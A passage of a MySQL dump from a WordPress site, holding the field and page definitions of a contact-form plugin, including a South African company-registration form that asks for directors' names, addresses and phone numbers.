File\",\"instruction\":\"\",\"required\":0,\"allowedExtensions\":\"png,jpg,gif,zip,rar,txt,doc,pdf\",\"maxSize\":512,\"maxSizeUnit\":\"KB\",\"identify\":\"attached_file\"},\"type\":\"file-upload\",\"position\":\"left\"}'),(19,175,'name','name',NULL,NULL,'left',0,'{\"id\":19,\"type\":\"name\",\"position\":\"left\",\"identify\":\"name\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Name\",\"instruction\":\"\",\"required\":\"1\",\"size\":\"jsn-input-mini-fluid\",\"items\":[{\"text\":\"Mrs\",\"checked\":false},{\"text\":\"Mr\",\"checked\":true},{\"text\":\"Ms\",\"checked\":false},{\"text\":\"Baby\",\"checked\":false},{\"text\":\"Master\",\"checked\":false},{\"text\":\"Prof\",\"checked\":false},{\"text\":\"Dr\",\"checked\":false},{\"text\":\"Gen\",\"checked\":false},{\"text\":\"Rep\",\"checked\":false},{\"text\":\"Sen\",\"checked\":false},{\"text\":\"St\",\"checked\":false}],\"format\":\"Extended\",\"vtitle\":\"1\",\"vfirst\":\"1\",\"vmiddle\":\"1\",\"vlast\":\"1\",\"identify\":\"name\",\"sortableField\":\"[\\\"vtitle\\\", \\\"vfirst\\\", \\\"vmiddle\\\", \\\"vlast\\\"]\"}}'),(20,175,'paragraph-text','what_is_the_best_way_to_contact_you_',NULL,NULL,'left',1,'{\"id\":20,\"type\":\"paragraph-text\",\"position\":\"left\",\"identify\":\"what_is_the_best_way_to_contact_you_\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"What is the best way to contact you?\",\"instruction\":\"\",\"required\":0,\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"rows\":\"8\",\"size\":\"jsn-input-xlarge-fluid\",\"limitType\":\"Words\",\"value\":\"\",\"identify\":\"what_is_the_best_way_to_contact_you_\"}}'),(21,175,'email','email',NULL,NULL,'left',2,'{\"id\":21,\"type\":\"email\",\"position\":\"left\",\"identify\":\"email\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Email\",\"instruction\":\"\",\"required\":\"1\",\"noDuplicates\":0,\"size\":\"jsn-input-medium-fluid\",\"value\":\"\",\"identify\":\"email\"}}'),(22,175,'website','website',NULL,NULL,'left',3,'{\"id\":22,\"type\":\"website\",\"position\":\"left\",\"identify\":\"website\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Website\",\"instruction\":\"\",\"required\":0,\"noDuplicates\":0,\"size\":\"jsn-input-medium-fluid\",\"value\":\"http:\\/\\/\",\"identify\":\"website\"}}'),(23,175,'single-line-text','message_subject',NULL,NULL,'left',4,'{\"id\":23,\"type\":\"single-line-text\",\"position\":\"left\",\"identify\":\"message_subject\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Message Subject\",\"instruction\":\"\",\"required\":\"1\",\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"limitType\":\"Words\",\"size\":\"jsn-input-medium-fluid\",\"value\":\"\",\"identify\":\"message_subject\"}}'),(24,175,'paragraph-text','message',NULL,NULL,'left',5,'{\"id\":24,\"type\":\"paragraph-text\",\"position\":\"left\",\"identify\":\"message\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Message\",\"instruction\":\"\",\"required\":\"1\",\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"rows\":\"8\",\"size\":\"jsn-input-xlarge-fluid\",\"limitType\":\"Words\",\"value\":\"\",\"identify\":\"message\"}}'),(25,175,'file-upload','attached_file',NULL,NULL,'left',6,'{\"id\":25,\"type\":\"file-upload\",\"position\":\"left\",\"identify\":\"attached_file\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Attached File\",\"instruction\":\"\",\"required\":0,\"allowedExtensions\":\"png,jpg,gif,zip,rar,txt,doc,pdf\",\"maxSize\":512,\"maxSizeUnit\":\"KB\",\"identify\":\"attached_file\"}}');
/*!40000 ALTER TABLE `wpxb_wr_contactform_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wr_contactform_form_pages`
--

DROP TABLE IF EXISTS `wpxb_wr_contactform_form_pages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wr_contactform_form_pages` (
  `page_id` int(11) NOT NULL AUTO_INCREMENT,
  `page_title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `form_id` int(11) NOT NULL,
  `page_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `page_template` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `page_container` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`page_id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wr_contactform_form_pages`
--

LOCK TABLES `wpxb_wr_contactform_form_pages` WRITE;
/*!40000 ALTER TABLE `wpxb_wr_contactform_form_pages` DISABLE KEYS */;
INSERT INTO `wpxb_wr_contactform_form_pages` VALUES (1,'Page 1',13,'[{\"id\":\"1\",\"type\":\"choices\",\"position\":\"left_2\",\"identify\":\"choices_67792955822_33_23\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Number of directors\",\"instruction\":\"\",\"required\":\"1\",\"randomize\":0,\"labelOthers\":\"Others\",\"layout\":\"jsn-columns-count-no\",\"items\":[{\"text\":\"1\",\"checked\":false},{\"text\":\"2\",\"checked\":false},{\"text\":\"3\",\"checked\":true},{\"text\":\"4\",\"checked\":false},{\"text\":\"more than 4\",\"checked\":false}],\"value\":\"\",\"customClass\":\"\",\"itemAction\":\"{\\\"1\\\":{},\\\"2\\\":{\\\"showField\\\":[\\\"name_30352531422_44_35\\\",\\\"physical_home_address_of_1st_director_67334520823_20_50\\\"]},\\\"3\\\":{\\\"showField\\\":[\\\"name_30352531422_44_35\\\",\\\"physical_home_address_of_1st_director_67334520823_20_50\\\",\\\"full_name_2nd_director_29773269723_18_53\\\",\\\"physical_home_address_of_1st_director_30978551523_15_21\\\"]},\\\"4\\\":{},\\\"more than 4\\\":{}}\",\"identify\":\"choices_67792955822_33_23\"}},{\"id\":\"2\",\"type\":\"paragraph-text\",\"position\":\"left_2\",\"identify\":\"paragraph_text_17959519822_36_46\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Your Company Name\",\"instruction\":\"Provide at least 4 names each on a new line. Try different names rather than different variations of the same name.\\r\\nNote if the name is not available this may cause delays in the registration of the company; i.e. until a suitable name is found.\",\"required\":\"1\",\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"rows\":\"3\",\"size\":\"jsn-input-xlarge-fluid\",\"limitType\":\"Words\",\"value\":\"\",\"customClass\":\"\",\"identify\":\"paragraph_text_17959519822_36_46\"}},{\"id\":\"10\",\"type\":\"address\",\"position\":\"left_2\",\"identify\":\"address_8505540139_7_12\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Physical address of the company\",\"instruction\":\"This can be a home address if you do have premises as yet\",\"required\":\"1\",\"vstreetAddress\":\"1\",\"vcity\":\"1\",\"vstate\":\"1\",\"vcode\":\"1\",\"vcountry\":\"1\",\"country\":[{\"text\":\"Afghanistan\",\"checked\":false},{\"text\":\"Albania\",\"checked\":false},{\"text\":\"Algeria\",\"checked\":false},{\"text\":\"Andorra\",\"checked\":false},{\"text\":\"Angola\",\"checked\":false},{\"text\":\"Antigua and Barbuda\",\"checked\":false},{\"text\":\"Argentina\",\"checked\":false},{\"text\":\"Armenia\",\"checked\":false},{\"text\":\"Australia\",\"checked\":false},{\"text\":\"Austria\",\"checked\":false},{\"text\":\"Azerbaijan\",\"checked\":false},{\"text\":\"Bahamas\",\"checked\":false},{\"text\":\"Bahrain\",\"checked\":false},{\"text\":\"Bangladesh\",\"checked\":false},{\"text\":\"Barbados\",\"checked\":false},{\"text\":\"Belarus\",\"checked\":false},{\"text\":\"Belgium\",\"checked\":false},{\"text\":\"Belize\",\"checked\":false},{\"text\":\"Benin\",\"checked\":false},{\"text\":\"Bhutan\",\"checked\":false},{\"text\":\"Bolivia\",\"checked\":false},{\"text\":\"Bosnia and Herzegovina\",\"checked\":false},{\"text\":\"Botswana\",\"checked\":false},{\"text\":\"Brazil\",\"checked\":false},{\"text\":\"Brunei\",\"checked\":false},{\"text\":\"Bulgaria\",\"checked\":false},{\"text\":\"Burkina Faso\",\"checked\":false},{\"text\":\"Burundi\",\"checked\":false},{\"text\":\"Cambodia\",\"checked\":false},{\"text\":\"Cameroon\",\"checked\":false},{\"text\":\"Canada\",\"checked\":false},{\"text\":\"Cape Verde\",\"checked\":false},{\"text\":\"Central African Republic\",\"checked\":false},{\"text\":\"Chad\",\"checked\":false},{\"text\":\"Chile\",\"checked\":false},{\"text\":\"China\",\"checked\":false},{\"text\":\"Colombi\",\"checked\":false},{\"text\":\"Comoros\",\"checked\":false},{\"text\":\"Congo (Brazzaville)\",\"checked\":false},{\"text\":\"Congo\",\"checked\":false},{\"text\":\"Costa Rica\",\"checked\":false},{\"text\":\"Cote d\'Ivoire\",\"checked\":false},{\"text\":\"Croatia\",\"checked\":false},{\"text\":\"Cuba\",\"checked\":false},{\"text\":\"Cyprus\",\"checked\":false},{\"text\":\"Czech Republic\",\"checked\":false},{\"text\":\"Denmark\",\"checked\":false},{\"text\":\"Djibouti\",\"checked\":false},{\"text\":\"Dominica\",\"checked\":false},{\"text\":\"Dominican Republic\",\"checked\":false},{\"text\":\"East Timor (Timor Timur)\",\"checked\":false},{\"text\":\"Ecuador\",\"checked\":false},{\"text\":\"Egypt\",\"checked\":false},{\"text\":\"El Salvador\",\"checked\":false},{\"text\":\"Equatorial Guinea\",\"checked\":false},{\"text\":\"Eritrea\",\"checked\":false},{\"text\":\"Estonia\",\"checked\":false},{\"text\":\"Ethiopia\",\"checked\":false},{\"text\":\"Fiji\",\"checked\":false},{\"text\":\"Finland\",\"checked\":false},{\"text\":\"France\",\"checked\":false},{\"text\":\"Gabon\",\"checked\":false},{\"text\":\"Gambia,\\n\\t\\t\\t The\",\"checked\":false},{\"text\":\"Georgia\",\"checked\":false},{\"text\":\"Germany\",\"checked\":false},{\"text\":\"Ghana\",\"checked\":false},{\"text\":\"Greece\",\"checked\":false},{\"text\":\"Grenada\",\"checked\":false},{\"text\":\"Guatemala\",\"checked\":false},{\"text\":\"Guinea\",\"checked\":false},{\"text\":\"Guinea-Bissau\",\"checked\":false},{\"text\":\"Guyana\",\"checked\":false},{\"text\":\"Haiti\",\"checked\":false},{\"text\":\"Honduras\",\"checked\":false},{\"text\":\"Hungary\",\"checked\":false},{\"text\":\"Iceland\",\"checked\":false},{\"text\":\"India\",\"checked\":false},{\"text\":\"Indonesia\",\"checked\":false},{\"text\":\"Iran\",\"checked\":false},{\"text\":\"Iraq\",\"checked\":false},{\"text\":\"Ireland\",\"checked\":false},{\"text\":\"Israel\",\"checked\":false},{\"text\":\"Italy\",\"checked\":false},{\"text\":\"Jamaica\",\"checked\":false},{\"text\":\"Japan\",\"checked\":false},{\"text\":\"Jordan\",\"checked\":false},{\"text\":\"Kazakhstan\",\"checked\":false},{\"text\":\"Kenya\",\"checked\":false},{\"text\":\"Kiribati\",\"checked\":false},{\"text\":\"Korea,\\n\\t\\t\\t North\",\"checked\":false},{\"text\":\"Korea,\\n\\t\\t\\t South\",\"checked\":false},{\"text\":\"Kuwait\",\"checked\":false},{\"text\":\"Kyrgyzstan\",\"checked\":false},{\"text\":\"Laos\",\"checked\":false},{\"text\":\"Latvia\",\"checked\":false},{\"text\":\"Lebanon\",\"checked\":false},{\"text\":\"Lesotho\",\"checked\":false},{\"text\":\"Liberia\",\"checked\":false},{\"text\":\"Libya\",\"checked\":false},{\"text\":\"Liechtenstein\",\"checked\":false},{\"text\":\"Lithuania\",\"checked\":false},{\"text\":\"Luxembourg\",\"checked\":false},{\"text\":\"Macedonia\",\"checked\":false},{\"text\":\"Madagascar\",\"checked\":false},{\"text\":\"Malawi\",\"checked\":false},{\"text\":\"Malaysia\",\"checked\":false},{\"text\":\"Maldives\",\"checked\":false},{\"text\":\"Mali\",\"checked\":false},{\"text\":\"Malta\",\"checked\":false},{\"text\":\"Marshall Islands\",\"checked\":false},{\"text\":\"Mauritania\",\"checked\":false},{\"text\":\"Mauritius\",\"checked\":false},{\"text\":\"Mexico\",\"checked\":false},{\"text\":\"Micronesia\",\"checked\":false},{\"text\":\"Moldova\",\"checked\":false},{\"text\":\"Monaco\",\"checked\":false},{\"text\":\"Mongolia\",\"checked\":false},{\"text\":\"Morocco\",\"checked\":false},{\"text\":\"Mozambique\",\"checked\":false},{\"text\":\"Myanmar\",\"checked\":false},{\"text\":\"Namibia\",\"checked\":false},{\"text\":\"Nauru\",\"checked\":false},{\"text\":\"Nepa\",\"checked\":false},{\"text\":\"Netherlands\",\"checked\":false},{\"text\":\"New Zealand\",\"checked\":false},{\"text\":\"Nicaragua\",\"checked\":false},{\"text\":\"Niger\",\"checked\":false},{\"text\":\"Nigeria\",\"checked\":false},{\"text\":\"Norway\",\"checked\":false},{\"text\":\"Oman\",\"checked\":false},{\"text\":\"Pakistan\",\"checked\":false},{\"text\":\"Palau\",\"checked\":false},{\"text\":\"Panama\",\"checked\":false},{\"text\":\"Papua New Guinea\",\"checked\":false},{\"text\":\"Paraguay\",\"checked\":false},{\"text\":\"Peru\",\"checked\":false},{\"text\":\"Philippines\",\"checked\":false},{\"text\":\"Poland\",\"checked\":false},{\"text\":\"Portugal\",\"checked\":false},{\"text\":\"Qatar\",\"checked\":false},{\"text\":\"Romania\",\"checked\":false},{\"text\":\"Russia\",\"checked\":false},{\"text\":\"Rwanda\",\"checked\":false},{\"text\":\"Saint Kitts and Nevis\",\"checked\":false},{\"text\":\"Saint Lucia\",\"checked\":false},{\"text\":\"Saint Vincent\",\"checked\":false},{\"text\":\"Samoa\",\"checked\":false},{\"text\":\"San Marino\",\"checked\":false},{\"text\":\"Sao Tome and Principe\",\"checked\":false},{\"text\":\"Saudi Arabia\",\"checked\":false},{\"text\":\"Senegal\",\"checked\":false},{\"text\":\"Serbia and Montenegro\",\"checked\":false},{\"text\":\"Seychelles\",\"checked\":false},{\"text\":\"Sierra Leone\",\"checked\":false},{\"text\":\"Singapore\",\"checked\":false},{\"text\":\"Slovakia\",\"checked\":false},{\"text\":\"Slovenia\",\"checked\":false},{\"text\":\"Solomon Islands\",\"checked\":false},{\"text\":\"Somalia\",\"checked\":false},{\"text\":\"South Africa\",\"checked\":true},{\"text\":\"Spain\",\"checked\":false},{\"text\":\"Sri Lanka\",\"checked\":false},{\"text\":\"Sudan\",\"checked\":false},{\"text\":\"Suriname\",\"checked\":false},{\"text\":\"Swaziland\",\"checked\":false},{\"text\":\"Sweden\",\"checked\":false},{\"text\":\"Switzerland\",\"checked\":false},{\"text\":\"Syria\",\"checked\":false},{\"text\":\"Taiwan\",\"checked\":false},{\"text\":\"Tajikistan\",\"checked\":false},{\"text\":\"Tanzania\",\"checked\":false},{\"text\":\"Thailand\",\"checked\":false},{\"text\":\"Togo\",\"checked\":false},{\"text\":\"Tonga\",\"checked\":false},{\"text\":\"Trinidad and Tobago\",\"checked\":false},{\"text\":\"Tunisia\",\"checked\":false},{\"text\":\"Turkey\",\"checked\":false},{\"text\":\"Turkmenistan\",\"checked\":false},{\"text\":\"Tuvalu\",\"checked\":false},{\"text\":\"Uganda\",\"checked\":false},{\"text\":\"Ukraine\",\"checked\":false},{\"text\":\"United Arab Emirates\",\"checked\":false},{\"text\":\"United Kingdom\",\"checked\":false},{\"text\":\"United States\",\"checked\":false},{\"text\":\"Uruguay\",\"checked\":false},{\"text\":\"Uzbekistan\",\"checked\":false},{\"text\":\"Vanuatu\",\"checked\":false},{\"text\":\"Vatican City\",\"checked\":false},{\"text\":\"Venezuela\",\"checked\":false},{\"text\":\"Vietnam\",\"checked\":false},{\"text\":\"Yemen\",\"checked\":false},{\"text\":\"Zambia\",\"checked\":false},{\"text\":\"Zimbabwe\",\"checked\":false}],\"identify\":\"address_8505540139_7_12\",\"customClass\":\"\",\"vstreetAddress2\":\"1\",\"sortableField\":\"[\\\"vstreetAddress\\\", \\\"vstreetAddress2\\\", \\\"vcity\\\", \\\"vstate\\\", \\\"vcode\\\", \\\"vcountry\\\"]\"}},{\"id\":\"3\",\"type\":\"name\",\"position\":\"left_2\",\"identify\":\"name_23574602122_30_20\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"1st Director\\/Incorporator\'s Full Name\",\"instruction\":\"This is generally one of the Directors\",\"required\":\"1\",\"size\":\"jsn-input-mini-fluid\",\"items\":[{\"text\":\"Mrs\",\"checked\":false},{\"text\":\"Mr\",\"checked\":true},{\"text\":\"Ms\",\"checked\":false},{\"text\":\"Baby\",\"checked\":false},{\"text\":\"Master\",\"checked\":false},{\"text\":\"Prof\",\"checked\":false},{\"text\":\"Dr\",\"checked\":false},{\"text\":\"Gen\",\"checked\":false},{\"text\":\"Rep\",\"checked\":false},{\"text\":\"Sen\",\"checked\":false},{\"text\":\"St\",\"checked\":false}],\"customClass\":\"\",\"vtitle\":\"1\",\"vfirst\":\"1\",\"vmiddle\":\"1\",\"vlast\":\"1\",\"sortableField\":\"[\\\"vtitle\\\", \\\"vfirst\\\", \\\"vmiddle\\\", \\\"vlast\\\"]\",\"identify\":\"name_23574602122_30_20\"}},{\"id\":\"4\",\"type\":\"address\",\"position\":\"left_2\",\"identify\":\"address_65991126722_39_27\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Physical Home Address of 1st Director\",\"instruction\":\"Please select country of citizenship if not South Africa\",\"required\":\"1\",\"vstreetAddress\":\"1\",\"vcity\":\"1\",\"vstate\":\"1\",\"vcode\":\"1\",\"vcountry\":\"1\",\"country\":[{\"text\":\"Afghanistan\",\"checked\":false},{\"text\":\"Albania\",\"checked\":false},{\"text\":\"Algeria\",\"checked\":false},{\"text\":\"Andorra\",\"checked\":false},{\"text\":\"Angola\",\"checked\":false},{\"text\":\"Antigua and Barbuda\",\"checked\":false},{\"text\":\"Argentina\",\"checked\":false},{\"text\":\"Armenia\",\"checked\":false},{\"text\":\"Australia\",\"checked\":false},{\"text\":\"Austria\",\"checked\":false},{\"text\":\"Azerbaijan\",\"checked\":false},{\"text\":\"Bahamas\",\"checked\":false},{\"text\":\"Bahrain\",\"checked\":false},{\"text\":\"Bangladesh\",\"checked\":false},{\"text\":\"Barbados\",\"checked\":false},{\"text\":\"Belarus\",\"checked\":false},{\"text\":\"Belgium\",\"checked\":false},{\"text\":\"Belize\",\"checked\":false},{\"text\":\"Benin\",\"checked\":false},{\"text\":\"Bhutan\",\"checked\":false},{\"text\":\"Bolivia\",\"checked\":false},{\"text\":\"Bosnia and Herzegovina\",\"checked\":false},{\"text\":\"Botswana\",\"checked\":false},{\"text\":\"Brazil\",\"checked\":false},{\"text\":\"Brunei\",\"checked\":false},{\"text\":\"Bulgaria\",\"checked\":false},{\"text\":\"Burkina Faso\",\"checked\":false},{\"text\":\"Burundi\",\"checked\":false},{\"text\":\"Cambodia\",\"checked\":false},{\"text\":\"Cameroon\",\"checked\":false},{\"text\":\"Canada\",\"checked\":false},{\"text\":\"Cape Verde\",\"checked\":false},{\"text\":\"Central African Republic\",\"checked\":false},{\"text\":\"Chad\",\"checked\":false},{\"text\":\"Chile\",\"checked\":false},{\"text\":\"China\",\"checked\":false},{\"text\":\"Colombi\",\"checked\":false},{\"text\":\"Comoros\",\"checked\":false},{\"text\":\"Congo (Brazzaville)\",\"checked\":false},{\"text\":\"Congo\",\"checked\":false},{\"text\":\"Costa Rica\",\"checked\":false},{\"text\":\"Cote d\'Ivoire\",\"checked\":false},{\"text\":\"Croatia\",\"checked\":false},{\"text\":\"Cuba\",\"checked\":false},{\"text\":\"Cyprus\",\"checked\":false},{\"text\":\"Czech Republic\",\"checked\":false},{\"text\":\"Denmark\",\"checked\":false},{\"text\":\"Djibouti\",\"checked\":false},{\"text\":\"Dominica\",\"checked\":false},{\"text\":\"Dominican Republic\",\"checked\":false},{\"text\":\"East Timor (Timor Timur)\",\"checked\":false},{\"text\":\"Ecuador\",\"checked\":false},{\"text\":\"Egypt\",\"checked\":false},{\"text\":\"El Salvador\",\"checked\":false},{\"text\":\"Equatorial Guinea\",\"checked\":false},{\"text\":\"Eritrea\",\"checked\":false},{\"text\":\"Estonia\",\"checked\":false},{\"text\":\"Ethiopia\",\"checked\":false},{\"text\":\"Fiji\",\"checked\":false},{\"text\":\"Finland\",\"checked\":false},{\"text\":\"France\",\"checked\":false},{\"text\":\"Gabon\",\"checked\":false},{\"text\":\"Gambia,\",\"checked\":false},{\"text\":\"\\t\\t\\t The\",\"checked\":false},{\"text\":\"Georgia\",\"checked\":false},{\"text\":\"Germany\",\"checked\":false},{\"text\":\"Ghana\",\"checked\":false},{\"text\":\"Greece\",\"checked\":false},{\"text\":\"Grenada\",\"checked\":false},{\"text\":\"Guatemala\",\"checked\":false},{\"text\":\"Guinea\",\"checked\":false},{\"text\":\"Guinea-Bissau\",\"checked\":false},{\"text\":\"Guyana\",\"checked\":false},{\"text\":\"Haiti\",\"checked\":false},{\"text\":\"Honduras\",\"checked\":false},{\"text\":\"Hungary\",\"checked\":false},{\"text\":\"Iceland\",\"checked\":false},{\"text\":\"India\",\"checked\":false},{\"text\":\"Indonesia\",\"checked\":false},{\"text\":\"Iran\",\"checked\":false},{\"text\":\"Iraq\",\"checked\":false},{\"text\":\"Ireland\",\"checked\":false},{\"text\":\"Israel\",\"checked\":false},{\"text\":\"Italy\",\"checked\":false},{\"text\":\"Jamaica\",\"checked\":false},{\"text\":\"Japan\",\"checked\":false},{\"text\":\"Jordan\",\"checked\":false},{\"text\":\"Kazakhstan\",\"checked\":false},{\"text\":\"Kenya\",\"checked\":false},{\"text\":\"Kiribati\",\"checked\":false},{\"text\":\"Korea,\",\"checked\":false},{\"text\":\"\\t\\t\\t North\",\"checked\":false},{\"text\":\"\\t\\t\\t South\",\"checked\":false},{\"text\":\"Kuwait\",\"checked\":false},{\"text\":\"Kyrgyzstan\",\"checked\":false},{\"text\":\"Laos\",\"checked\":false},{\"text\":\"Latvia\",\"checked\":false},{\"text\":\"Lebanon\",\"checked\":false},{\"text\":\"Lesotho\",\"checked\":false},{\"text\":\"Liberia\",\"checked\":false},{\"text\":\"Libya\",\"checked\":false},{\"text\":\"Liechtenstein\",\"checked\":false},{\"text\":\"Lithuania\",\"checked\":false},{\"text\":\"Luxembourg\",\"checked\":false},{\"text\":\"Macedonia\",\"checked\":false},{\"text\":\"Madagascar\",\"checked\":false},{\"text\":\"Malawi\",\"checked\":false},{\"text\":\"Malaysia\",\"checked\":false},{\"text\":\"Maldives\",\"checked\":false},{\"text\":\"Mali\",\"checked\":false},{\"text\":\"Malta\",\"checked\":false},{\"text\":\"Marshall Islands\",\"checked\":false},{\"text\":\"Mauritania\",\"checked\":false},{\"text\":\"Mauritius\",\"checked\":false},{\"text\":\"Mexico\",\"checked\":false},{\"text\":\"Micronesia\",\"checked\":false},{\"text\":\"Moldova\",\"checked\":false},{\"text\":\"Monaco\",\"checked\":false},{\"text\":\"Mongolia\",\"checked\":false},{\"text\":\"Morocco\",\"checked\":false},{\"text\":\"Mozambique\",\"checked\":false},{\"text\":\"Myanmar\",\"checked\":false},{\"text\":\"Namibia\",\"checked\":false},{\"text\":\"Nauru\",\"checked\":false},{\"text\":\"Nepa\",\"checked\":false},{\"text\":\"Netherlands\",\"checked\":false},{\"text\":\"New Zealand\",\"checked\":false},{\"text\":\"Nicaragua\",\"checked\":false},{\"text\":\"Niger\",\"checked\":false},{\"text\":\"Nigeria\",\"checked\":false},{\"text\":\"Norway\",\"checked\":false},{\"text\":\"Oman\",\"checked\":false},{\"text\":\"Pakistan\",\"checked\":false},{\"text\":\"Palau\",\"checked\":false},{\"text\":\"Panama\",\"checked\":false},{\"text\":\"Papua New Guinea\",\"checked\":false},{\"text\":\"Paraguay\",\"checked\":false},{\"text\":\"Peru\",\"checked\":false},{\"text\":\"Philippines\",\"checked\":false},{\"text\":\"Poland\",\"checked\":false},{\"text\":\"Portugal\",\"checked\":false},{\"text\":\"Qatar\",\"checked\":false},{\"text\":\"Romania\",\"checked\":false},{\"text\":\"Russia\",\"checked\":false},{\"text\":\"Rwanda\",\"checked\":false},{\"text\":\"Saint Kitts and Nevis\",\"checked\":false},{\"text\":\"Saint Lucia\",\"checked\":false},{\"text\":\"Saint Vincent\",\"checked\":false},{\"text\":\"Samoa\",\"checked\":false},{\"text\":\"San Marino\",\"checked\":false},{\"text\":\"Sao Tome and Principe\",\"checked\":false},{\"text\":\"Saudi Arabia\",\"checked\":false},{\"text\":\"Senegal\",\"checked\":false},{\"text\":\"Serbia and Montenegro\",\"checked\":false},{\"text\":\"Seychelles\",\"checked\":false},{\"text\":\"Sierra Leone\",\"checked\":false},{\"text\":\"Singapore\",\"checked\":false},{\"text\":\"Slovakia\",\"checked\":false},{\"text\":\"Slovenia\",\"checked\":false},{\"text\":\"Solomon Islands\",\"checked\":false},{\"text\":\"Somalia\",\"checked\":false},{\"text\":\"South Africa\",\"checked\":true},{\"text\":\"Spain\",\"checked\":false},{\"text\":\"Sri Lanka\",\"checked\":false},{\"text\":\"Sudan\",\"checked\":false},{\"text\":\"Suriname\",\"checked\":false},{\"text\":\"Swaziland\",\"checked\":false},{\"text\":\"Sweden\",\"checked\":false},{\"text\":\"Switzerland\",\"checked\":false},{\"text\":\"Syria\",\"checked\":false},{\"text\":\"Taiwan\",\"checked\":false},{\"text\":\"Tajikistan\",\"checked\":false},{\"text\":\"Tanzania\",\"checked\":false},{\"text\":\"Thailand\",\"checked\":false},{\"text\":\"Togo\",\"checked\":false},{\"text\":\"Tonga\",\"checked\":false},{\"text\":\"Trinidad and Tobago\",\"checked\":false},{\"text\":\"Tunisia\",\"checked\":false},{\"text\":\"Turkey\",\"checked\":false},{\"text\":\"Turkmenistan\",\"checked\":false},{\"text\":\"Tuvalu\",\"checked\":false},{\"text\":\"Uganda\",\"checked\":false},{\"text\":\"Ukraine\",\"checked\":false},{\"text\":\"United Arab Emirates\",\"checked\":false},{\"text\":\"United Kingdom\",\"checked\":false},{\"text\":\"United States\",\"checked\":false},{\"text\":\"Uruguay\",\"checked\":false},{\"text\":\"Uzbekistan\",\"checked\":false},{\"text\":\"Vanuatu\",\"checked\":false},{\"text\":\"Vatican City\",\"checked\":false},{\"text\":\"Venezuela\",\"checked\":false},{\"text\":\"Vietnam\",\"checked\":false},{\"text\":\"Yemen\",\"checked\":false},{\"text\":\"Zambia\",\"checked\":false},{\"text\":\"Zimbabwe\",\"checked\":false}],\"customClass\":\"\",\"vstreetAddress2\":\"1\",\"sortableField\":\"[\\\"vstreetAddress\\\", \\\"vstreetAddress2\\\", \\\"vcity\\\", \\\"vstate\\\", \\\"vcode\\\", \\\"vcountry\\\"]\",\"identify\":\"address_65991126722_39_27\"}},{\"id\":\"5\",\"type\":\"phone\",\"position\":\"left_2\",\"identify\":\"phone_29693815022_43_10\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Cell Phone number of 1st Director\",\"instruction\":\"\",\"required\":\"1\",\"format\":\"1-field\",\"value\":\"000 000 0000\",\"customClass\":\"\",\"oneField\":\"\",\"twoField\":\"\",\"threeField\":\"\",\"identify\":\"phone_29693815022_43_10\"}},{\"id\":\"6\",\"type\":\"name\",\"position\":\"left_1\",\"identify\":\"name_30352531422_44_35\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Full Name 2nd Director\",\"instruction\":\"\",\"required\":\"1\",\"size\":\"jsn-input-mini-fluid\",\"items\":[{\"text\":\"Mrs\",\"checked\":false},{\"text\":\"Mr\",\"checked\":true},{\"text\":\"Ms\",\"checked\":false},{\"text\":\"Baby\",\"checked\":false},{\"text\":\"Master\",\"checked\":false},{\"text\":\"Prof\",\"checked\":false},{\"text\":\"Dr\",\"checked\":false},{\"text\":\"Gen\",\"checked\":false},{\"text\":\"Rep\",\"checked\":false},{\"text\":\"Sen\",\"checked\":false},{\"text\":\"St\",\"checked\":false}],\"customClass\":\"\",\"hideField\":\"1\",\"vtitle\":\"1\",\"vfirst\":\"1\",\"vmiddle\":\"1\",\"vlast\":\"1\",\"sortableField\":\"[\\\"vtitle\\\", \\\"vfirst\\\", \\\"vmiddle\\\", \\\"vlast\\\"]\",\"identify\":\"name_30352531422_44_35\"}},{\"id\":\"7\",\"type\":\"address\",\"position\":\"left_1\",\"identify\":\"physical_home_address_of_1st_director_67334520823_20_50\",\"label\":null,\"instruction\":null,\"options\":{\"label\":\"Physical Home Address of 2nd Director\",\"instruction\":\"Please select country of citizenship if not South Africa\",\"required\":\"1\",\"vstreetAddress\":\"1\",\"vcity\":\"1\",\"vstate\":\"1\",\"vcode\":\"1\",\"vcountry\":\"1\",\"country\":[{\"text\":\"Afghanistan\",\"checked\":false},{\"text\":\"Albania\",\"checked\":false},{\"text\":\"Algeria\",\"checked\":false},{\"text\":\"Andorra\",\"checked\":false},{\"text\":\"Angola\",\"checked\":false},{\"text\":\"Antigua and 